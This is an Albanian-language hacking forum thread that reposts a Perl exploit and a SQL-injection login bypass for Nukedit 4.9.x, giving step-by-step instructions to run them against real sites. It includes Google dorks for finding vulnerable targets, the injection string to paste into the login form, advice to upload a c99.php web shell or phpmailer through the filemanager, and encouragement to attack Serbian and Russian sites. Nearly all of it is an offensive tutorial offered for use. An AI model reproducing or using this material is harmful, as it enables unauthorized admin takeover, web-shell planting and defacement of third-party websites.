Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  PortalliPortalli  GalleryGallery  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimiidentifikimi  
Kėrko
 
 

Display results as :
 
Rechercher Advanced Search
Tema Fundit
» Rreziqet dhe mbrojtja e rrjetit pa tela
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeMon Dec 19, 2011 3:20 pm nga baton

» Download 62 Programe
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeThu Dec 15, 2011 12:09 pm nga muha

» Paraqitni problemet tuaja
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeWed Dec 14, 2011 12:55 pm nga muha

» Nese e kini XP jo Origjinal atehere merrne patjeter ket Software
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeSun Dec 20, 2009 6:03 am nga CLIRIMI

» Chocolatier 2: The Secret Ingredient
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeMon Nov 02, 2009 7:38 pm nga konvict

» Beni KErKEsa pER fIlmA
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeThu May 07, 2009 11:20 am nga ZAMIRI75

» Exclamation 1 menyr per web hacking
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeSat Feb 07, 2009 5:11 pm nga p!rAt-xXx

» SONY ERICSSON S001 – I KA TĖ GJITHA
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeTue Feb 03, 2009 2:55 am nga p!rAt-xXx

» prezentimi
Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeWed Oct 29, 2008 9:10 pm nga Shkodran

Navigacion
 Portalli
 Indeksi
 Lista e Anėtarėve
 Profili
 Kėrko
Shiko rezultatet live

 

 Nukedit 4.9.x Remote Create Admin Exploit

Shko poshtė 
AutoriMesazh
p!rAt-xXx
Webmaster
Webmaster
p!rAt-xXx


Male
Numri i postimeve : 232
Location : System32
Job/hobbies : HaCk3r iN kOsoVA
Registration date : 04/02/2008

Nukedit 4.9.x Remote Create Admin Exploit Empty
MesazhTitulli: Nukedit 4.9.x Remote Create Admin Exploit   Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeFri Mar 07, 2008 1:38 am

Nukedit 4.9.x Remote Create Admin Exploit


Cito:

#!/usr/bin/perl##############################################
##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit:
r3dm0v3 ## http://r3dm0v3.persianblog.ir
## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp
##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes
##Dork: "Powered by Nukedit" ##Fix: Not Available
################################################## ##########use
LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if
(substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail =
$ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union
select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737
e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if
(@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print
"[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging
in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar =
HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res =
$xpl->post($url.'utilities/login.asp',Content => ["redir" =>
"/nukedit/default.asp","email" => "$usrSQL","password" =>
"r3dm0v3","savepassword" => "false","submit" => "Login",],);if
($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{
print "[-] Can not login!\n"; exit();}print "[~] Creating
Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content
=> ["action" => "addDB","username" => "r3dm0v3","company"
=> "red move","url" => "http://r3dm0v3.persianblog.ir","address"
=> "a","county" => "b","zip" => "666","country" =>
"Iran","phone" => "66666666","fax" => "12345678","email" =>
"$usrmail","password" => "$passwd","groupid" => "1","submit1"
=> "Add User >>","IP" => "127.0.0.2",],);if
($res->content =~ /Object Moved/){ print "[+] Admin added. Login
info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print
"[-] Exploit failed!\n"; print $res->content;}sub Banner{print
"################################################# ###########\n". "#
Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "#
r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir
#\n". "#################################################
###########\n";}sub Usage(){print "\n Usage: nukedit.pl
<host&path> <email> <password>\n";print " ex. :
nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}#
milw0rm.com [2008-02-26]

Per te Hapur Ket Exploit duhet te keni Prelin te Instaluar.
pra shum thjesht eshte Nukedit 4.9.x Remote Create Admin Exploit Icon_biggrin se pari Exploitin qe eshte me nalt e beni copy dhe e qitni
ne Notepad dhe e beni sava as psh: hack.pl pra e ruani me nje
emer qe doni dhe me mbares .pl
pastaj e qitni ne C:/
dhe hym ne Start , Run, dhe CMD
dhe shkruajm kshtu: cd\ dhe enter
pastaj e shkruajm emrin e exploitit un e morra shembull hack.pl
dhe psh kshtu:

Kodi:

hack.pl emriivebsajtit.com/ emalijot@hotmail.com 123456

dhe pastaj Enter
nqoft se kemi fat krijohet Admini dhe mund te Logiratesh dhe
pastaj eshte ne doren tendeNukedit 4.9.x Remote Create Admin Exploit Icon_biggrin
Si te kerkosh ne Google.com:
dhe Pastaj merrni nje link dhe veproni si me nalt.








Kodi:

"Powered by Nukedit"

Ose

Kodi:

inurl:utilities/login.asp

Mir, tash edhe nje metod tjeter pa pl Razz se pritoni ( apo se keni te instaluar Nukedit 4.9.x Remote Create Admin Exploit Icon_biggrin )


Kodi:

#Title: Nukedit 4.9.x Login Bypass SQL injection
#
#Discovered By: r3dm0v3
# http://r3dm0v3.persianblog.ir
# r3dm0v3( 4t ) yahoo [dot] com
# Tehran - Iran
#
#Download: http://www.nukedit.com/content/Download.asp
#Vulnerables: 4.9.x, prior versions maybe vulnerable
#Remote: Yes
#Dork: "Powered by Nukedit"
# inurl:utilities/login.asp
#Fix: Not Available #POC:
#goto http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below:
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
#Password: r3dm0v3
#Click Login and you will get in as an admin.
#There some other sql injections in other pages.

Kjo edhe me e leht Nukedit 4.9.x Remote Create Admin Exploit Icon_biggrin kerkoni njejt ne google.com hini te ndonjera faqe
dhe pastaj shkoni Login, nqoft se nuk e ka mund te ja shtojsh psh:

Kodi:

http://websajti.com/utilities/login.asp

dhe pastaj tek Email: ja jep ket kod psh:

Kodi:

Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
Password: r3dm0v3
Login

dhe Pastaj hini ne admin beni qka te duni Nukedit 4.9.x Remote Create Admin Exploit Icon_razz veq mos ja prishni Razz
dhe diqka nqoft se i hini ndonje websajti mund ta shfytzoni per veti:

Kodi:

www.faqja.com/filemanager

dhe pastaj aty e uplodon phpmailerin ose c99.php shellin per te ber qka te duni etj.
Besoj se keni kuptuar eshte thjesht shum, por ka te hackerume shum
po ju hini persdyt Razz Nukedit 4.9.x Remote Create Admin Exploit Icon_wink
ajt me te mira Nukedit 4.9.x Remote Create Admin Exploit Icon_biggrin
Nqoft se deiqka skeni kuptuar vetem pyetni Nukedit 4.9.x Remote Create Admin Exploit Icon_biggrin
dhe kqyrni ma shum faqe te Serbve dhe Rusve Nukedit 4.9.x Remote Create Admin Exploit Icon_wink
Mbrapsht nė krye Shko poshtė
http://www.hard-team.org
 
Nukedit 4.9.x Remote Create Admin Exploit
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Create logo
» phpBB Mod FileBase (id) Remote SQL Injection Vulnerability
» Shikoni kete exploit e gjeta hte eshte per Hack Phbb
» Shikoni kete exploit e gjeta hte eshte per Hack Phbb
» Linux Local Root Exploit kernel Linux 2.6.23 - 2.6.24

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Exploits-
Kėrce tek: